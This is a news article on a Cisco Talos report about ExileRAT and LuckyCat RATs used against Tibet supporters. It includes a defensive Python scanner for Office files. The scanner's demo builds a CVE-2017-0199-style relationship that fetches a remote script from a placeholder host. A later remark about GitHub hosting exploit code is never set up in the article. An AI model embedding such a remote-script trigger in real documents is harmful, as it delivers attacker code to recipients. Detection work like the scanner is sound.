Cisco Talos has identified a pair of Remote Access Trojans (RATs) targeting supporters of Tibet. Both use the same command and control (C2) servers and some of the same domains. One of the RATs also extracts the key that protects the victim's locally stored WeChat messages, which lets the attackers decrypt and read them.
The details of the attacks were revealed in a blog by security researchers Warren Mercer, Paul Rascagneres and Jaeson Schultz. According to the blog: “The infrastructure used for the command and control (C2) in this campaign has been previously linked to the LuckyCat Android- and Windows-based trojans. The discovery of the C2 led us to identify multiple campaigns being hosted on the C2 using the same payloads, configurations and more.”
This attack is clearly political and is aimed at those who want a free Tibet.
Why is Tibet being targeted?
Chinese hackers have regularly targeted the political supporters of a free Tibet, and this is just the latest in a long string of attacks. What gives this campaign more prominence is its timing: this is the 60th anniversary of the Dalai Lama going into exile.
March 31 is also the anniversary of the establishment of the Tibetan government-in-exile, and a number of events and protests are planned around that date. The attackers are almost certainly looking for information on what is being planned and who is involved.
RAT 1 – ExileRAT
The researchers started out by monitoring malware they have named ExileRAT. The lure was sent to a mailing list run by the Central Tibetan Administration (CTA), the official Tibetan government-in-exile, which campaigns for a return to independence. As such, it is a key target for Chinese state-sponsored hackers.
The lure is a presentation belonging to the CTA titled “Tibet was never a part of China.” The original is a PDF published in November 2018 and can be downloaded from the CTA website. The attackers modified it and distributed it as a PowerPoint slideshow (PPSX). The slideshow exploits CVE-2017-0199, a known remote code execution vulnerability in Microsoft Office that Microsoft patched in April 2017; on an unpatched machine, simply opening the file runs attacker-controlled code.
Once that code runs, it downloads the ExileRAT malware. ExileRAT reports the machine's IP address along with other data such as the username, drives and network adapter details. It also lets the attackers deploy new files and manage processes on the infected computer.
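The PPSX lure described above is a ZIP container of XML parts (Office Open XML), and the CVE-2017-0199 trigger lives in the relationship files that tell Office where an embedded object comes from: a relationship marked TargetMode="External" whose target is an OLE object or a `script:` moniker pointing at a remote server. The following is an added example written for this article, not code from Cisco Talos or from the attackers' toolkit. It scans any OOXML file for such external object links and flags them, while leaving ordinary external hyperlinks alone. The sample slideshow is constructed in memory; the host `203.0.113.10` and the file name `logo.sct` are placeholders, and the malicious relationship mirrors the shape of public CVE-2017-0199 PPSX samples rather than the specific file in this campaign.

```python
"""Heuristic scanner for Office Open XML files (PPSX/PPTX/DOCX/XLSX) that
flags external object relationships of the kind used to trigger CVE-2017-0199.

Added example for this article; not the Talos report's code. The sample PPSX
built below is constructed for the demo: 203.0.113.10 (TEST-NET-3) and
logo.sct are placeholders, not indicators from the campaign.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
OLE_TYPE = REL_BASE + "oleObject"
# Monikers that make Office fetch and execute remote content when resolved.
REMOTE_MONIKER = re.compile(r"^(script|mhtml):", re.IGNORECASE)


def scan_ooxml(data: bytes) -> List[Dict[str, str]]:
    """Return one finding per external relationship that looks like a remote
    OLE object or script moniker. External hyperlinks are normal and ignored."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                # OOXML defaults TargetMode to Internal when the attribute is absent.
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                rtype = rel.get("Type", "")
                if rtype == OLE_TYPE:
                    reason = "external OLE object (remote object is fetched on open)"
                elif REMOTE_MONIKER.match(target):
                    reason = "remote script/mhtml moniker"
                else:
                    continue  # e.g. a plain hyperlink to a web page
                findings.append({
                    "part": part,
                    "id": rel.get("Id", ""),
                    "type": rtype.rsplit("/", 1)[-1],
                    "target": target,
                    "reason": reason,
                })
    return findings


def build_sample_ppsx(malicious: bool) -> bytes:
    """Construct a minimal PPSX-like container for the demo. Real files carry
    many more parts; only the slide relationship file matters here."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId1" Type="{REL_BASE}slideLayout" '
        'Target="../slideLayouts/slideLayout1.xml"/>'
        # A legitimate external hyperlink: must NOT be flagged.
        f'<Relationship Id="rId2" Type="{REL_BASE}hyperlink" '
        'Target="https://example.org/" TargetMode="External"/>'
    )
    if malicious:
        # Shape of the CVE-2017-0199 PPSX trigger: external OLE object whose
        # target is a script moniker pointing at an attacker-controlled host.
        rels += (f'<Relationship Id="rId3" Type="{OLE_TYPE}" '
                 'Target="script:http://203.0.113.10/logo.sct" TargetMode="External"/>')
    rels += "</Relationships>"

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("ppt/slides/slide1.xml",
                    '<?xml version="1.0"?><p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for label, sample in (("benign", build_sample_ppsx(False)),
                          ("weaponised", build_sample_ppsx(True))):
        hits = scan_ooxml(sample)
        print(f"{label}: {len(hits)} finding(s)")
        for hit in hits:
            print(f"  {hit['part']} {hit['id']} {hit['type']} -> {hit['target']} [{hit['reason']}]")
```

To check a real file, read it from disk and pass the bytes to `scan_ooxml`. The check is deliberately narrow: an external OLE object or a `script:`/`mhtml:` moniker has no place in a slideshow received by email, so any hit is worth quarantining, while ordinary hyperlinks, which also carry TargetMode="External", are not reported.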
RAT 2 – LuckyCat Android RAT
The second RAT seen on the C2 servers is a new version of the LuckyCat Android RAT, which has also been used in the past against Tibetan activists and supporters of a free Tibet. The researchers found that the updated malware can execute apps, record audio and steal personal contact data. It can also steal and delete SMS messages, call records and location data.
The ability to steal SMS messages lets an attacker use the phone to get around two-factor authentication (2FA) schemes that send the second factor by text message. By intercepting the SMS code, they can access bank accounts and reset passwords on services that rely on SMS-based 2FA.
Are both RATs owned by the same attacker?
This is highly likely. The shared C2 infrastructure is just one indication that both RATs come from the same source. When the Cisco Talos team looked more closely at the code they found further indicators. For example:
- Functions and other code features share the same names
- Blocks of code appear to have been copied and pasted between the two RATs
- Both RATs use some of the same malicious domains, which point at the shared C2 servers
Enterprise Times: What does this mean?
Hacking attacks against political opponents are becoming commonplace around the world. What was once predominantly a hacktivist activity run by often disorganised groups has evolved: many of the attacks are now carried out by professional groups that are often state-sponsored. These two RATs bear all the hallmarks of such a group.
While sharing infrastructure is not uncommon, the amount of shared code and the close alignment of the two attacks is notable. It shows that the attackers are not relying on a single operating system or type of device. They are also collecting geolocation data from all infected devices, whether Windows machines or Android phones. That could well provide the intelligence for police and other agencies inside China to make mass arrests and stop any protests at the 60th anniversary of the Dalai Lama's exile.
There is also a message here for Microsoft. There is an irony in GitHub, the code repository it bought to widen its developer community, hosting code that exploits Microsoft's own Office vulnerabilities. It will be interesting to see how Microsoft reacts.
Will it now look to harden the terms and conditions for GitHub and begin removing and blocking accounts where exploit code is found? If so, it could be in for a long and complicated task that may backfire. Many developers were worried that Microsoft would try to mine the code on the site, and the company explicitly said this would not happen. Acting on verified reports from security companies about exploit code, however, would let it address the problem without a blanket policy.
For now, supporters of a Free Tibet are well advised to be careful what emails and documents they open, and to make sure Office is fully patched: the vulnerability used here, CVE-2017-0199, was fixed by Microsoft in 2017, so an up-to-date installation will not run the lure's code.